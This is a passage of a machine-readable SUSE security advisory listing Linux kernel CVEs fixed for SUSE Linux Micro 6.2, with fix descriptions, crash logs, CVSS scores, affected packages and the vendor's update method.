"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71157"
},
{
"cve": "CVE-2025-71162",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71162"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: tegra-adma: Fix use-after-free\n\nA use-after-free bug exists in the Tegra ADMA driver when audio streams\nare terminated, particularly during XRUN conditions. The issue occurs\nwhen the DMA buffer is freed by tegra_adma_terminate_all() before the\nvchan completion tasklet finishes accessing it.\n\nThe race condition follows this sequence:\n\n 1. DMA transfer completes, triggering an interrupt that schedules the\n completion tasklet (tasklet has not executed yet)\n 2. Audio playback stops, calling tegra_adma_terminate_all() which\n frees the DMA buffer memory via kfree()\n 3. The scheduled tasklet finally executes, calling vchan_complete()\n which attempts to access the already-freed memory\n\nSince tasklets can execute at any time after being scheduled, there is\nno guarantee that the buffer will remain valid when vchan_complete()\nruns.\n\nFix this by properly synchronizing the virtual channel completion:\n - Calling vchan_terminate_vdesc() in tegra_adma_stop() to mark the\n descriptors as terminated instead of freeing the descriptor.\n - Add the callback tegra_adma_synchronize() that calls\n vchan_synchronize() which kills any pending tasklets and frees any\n terminated descriptors.\n\nCrash logs:\n[ 337.427523] BUG: KASAN: use-after-free in vchan_complete+0x124/0x3b0\n[ 337.427544] Read of size 8 at addr ffff000132055428 by task swapper/0/0\n\n[ 337.427562] Call trace:\n[ 337.427564] dump_backtrace+0x0/0x320\n[ 337.427571] show_stack+0x20/0x30\n[ 337.427575] dump_stack_lvl+0x68/0x84\n[ 337.427584] print_address_description.constprop.0+0x74/0x2b8\n[ 337.427590] kasan_report+0x1f4/0x210\n[ 337.427598] __asan_load8+0xa0/0xd0\n[ 337.427603] vchan_complete+0x124/0x3b0\n[ 337.427609] tasklet_action_common.constprop.0+0x190/0x1d0\n[ 337.427617] tasklet_action+0x30/0x40\n[ 337.427623] __do_softirq+0x1a0/0x5c4\n[ 337.427628] irq_exit+0x110/0x140\n[ 337.427633] handle_domain_irq+0xa4/0xe0\n[ 337.427640] gic_handle_irq+0x64/0x160\n[ 337.427644] call_on_irq_stack+0x20/0x4c\n[ 337.427649] do_interrupt_handler+0x7c/0x90\n[ 337.427654] el1_interrupt+0x30/0x80\n[ 337.427659] el1h_64_irq_handler+0x18/0x30\n[ 337.427663] el1h_64_irq+0x7c/0x80\n[ 337.427667] cpuidle_enter_state+0xe4/0x540\n[ 337.427674] cpuidle_enter+0x54/0x80\n[ 337.427679] do_idle+0x2e0/0x380\n[ 337.427685] cpu_startup_entry+0x2c/0x70\n[ 337.427690] rest_init+0x114/0x130\n[ 337.427695] arch_call_rest_init+0x18/0x24\n[ 337.427702] start_kernel+0x380/0x3b4\n[ 337.427706] __primary_switched+0xc0/0xc8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71162",
"url": "https://www.suse.com/security/cve/CVE-2025-71162"
},
{
"category": "external",
"summary": "SUSE Bug 1257204 for CVE-2025-71162",
"url": "https://bugzilla.suse.com/1257204"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71162"
},
{
"cve": "CVE-2025-71163",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71163"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: fix device leaks on compat bind and unbind\n\nMake sure to drop the reference taken when looking up the idxd device as\npart of the compat bind and unbind sysfs interface.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71163",
"url": "https://www.suse.com/security/cve/CVE-2025-71163"
},
{
"category": "external",
"summary": "SUSE Bug 1257215 for CVE-2025-71163",
"url": "https://bugzilla.suse.com/1257215"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71163"
},
{
"cve": "CVE-2026-22976",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22976"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset\n\n`qfq_class-\u003eleaf_qdisc-\u003eq.qlen \u003e 0` does not imply that the class\nitself is active.\n\nTwo qfq_class objects may point to the same leaf_qdisc. This happens\nwhen:\n\n1. one QFQ qdisc is attached to the dev as the root qdisc, and\n\n2. another QFQ qdisc is temporarily referenced (e.g., via qdisc_get()\n/ qdisc_put()) and is pending to be destroyed, as in function\ntc_new_tfilter.\n\nWhen packets are enqueued through the root QFQ qdisc, the shared\nleaf_qdisc-\u003eq.qlen increases. At the same time, the second QFQ\nqdisc triggers qdisc_put and qdisc_destroy: the qdisc enters\nqfq_reset() with its own q-\u003eq.qlen == 0, but its class\u0027s leaf\nqdisc-\u003eq.qlen \u003e 0. Therefore, the qfq_reset would wrongly deactivate\nan inactive aggregate and trigger a null-deref in qfq_deactivate_agg:\n\n[ 0.903172] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[ 0.903571] #PF: supervisor write access in kernel mode\n[ 0.903860] #PF: error_code(0x0002) - not-present page\n[ 0.904177] PGD 10299b067 P4D 10299b067 PUD 10299c067 PMD 0\n[ 0.904502] Oops: Oops: 0002 [#1] SMP NOPTI\n[ 0.904737] CPU: 0 UID: 0 PID: 135 Comm: exploit Not tainted 6.19.0-rc3+ #2 NONE\n[ 0.905157] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014\n[ 0.905754] RIP: 0010:qfq_deactivate_agg (include/linux/list.h:992 (discriminator 2) include/linux/list.h:1006 (discriminator 2) net/sched/sch_qfq.c:1367 (discriminator 2) net/sched/sch_qfq.c:1393 (discriminator 2))\n[ 0.906046] Code: 0f 84 4d 01 00 00 48 89 70 18 8b 4b 10 48 c7 c2 ff ff ff ff 48 8b 78 08 48 d3 e2 48 21 f2 48 2b 13 48 8b 30 48 d3 ea 8b 4b 18 0\n\nCode starting with the faulting instruction\n===========================================\n 0:\t0f 84 4d 01 00 00 \tje 0x153\n 6:\t48 89 70 18 \tmov %rsi,0x18(%rax)\n a:\t8b 4b 10 \tmov 0x10(%rbx),%ecx\n d:\t48 c7 c2 ff ff ff ff \tmov $0xffffffffffffffff,%rdx\n 14:\t48 8b 78 08 \tmov 0x8(%rax),%rdi\n 18:\t48 d3 e2 \tshl %cl,%rdx\n 1b:\t48 21 f2 \tand %rsi,%rdx\n 1e:\t48 2b 13 \tsub (%rbx),%rdx\n 21:\t48 8b 30 \tmov (%rax),%rsi\n 24:\t48 d3 ea \tshr %cl,%rdx\n 27:\t8b 4b 18 \tmov 0x18(%rbx),%ecx\n\t...\n[ 0.907095] RSP: 0018:ffffc900004a39a0 EFLAGS: 00010246\n[ 0.907368] RAX: ffff8881043a0880 RBX: ffff888102953340 RCX: 0000000000000000\n[ 0.907723] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 0.908100] RBP: ffff888102952180 R08: 0000000000000000 R09: 0000000000000000\n[ 0.908451] R10: ffff8881043a0000 R11: 0000000000000000 R12: ffff888102952000\n[ 0.908804] R13: ffff888102952180 R14: ffff8881043a0ad8 R15: ffff8881043a0880\n[ 0.909179] FS: 000000002a1a0380(0000) GS:ffff888196d8d000(0000) knlGS:0000000000000000\n[ 0.909572] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 0.909857] CR2: 0000000000000000 CR3: 0000000102993002 CR4: 0000000000772ef0\n[ 0.910247] PKRU: 55555554\n[ 0.910391] Call Trace:\n[ 0.910527] \u003cTASK\u003e\n[ 0.910638] qfq_reset_qdisc (net/sched/sch_qfq.c:357 net/sched/sch_qfq.c:1485)\n[ 0.910826] qdisc_reset (include/linux/skbuff.h:2195 include/linux/skbuff.h:2501 include/linux/skbuff.h:3424 include/linux/skbuff.h:3430 net/sched/sch_generic.c:1036)\n[ 0.911040] __qdisc_destroy (net/sched/sch_generic.c:1076)\n[ 0.911236] tc_new_tfilter (net/sched/cls_api.c:2447)\n[ 0.911447] rtnetlink_rcv_msg (net/core/rtnetlink.c:6958)\n[ 0.911663] ? __pfx_rtnetlink_rcv_msg (net/core/rtnetlink.c:6861)\n[ 0.911894] netlink_rcv_skb (net/netlink/af_netlink.c:2550)\n[ 0.912100] netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344)\n[ 0.912296] ? __alloc_skb (net/core/skbuff.c:706)\n[ 0.912484] netlink_sendmsg (net/netlink/af\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
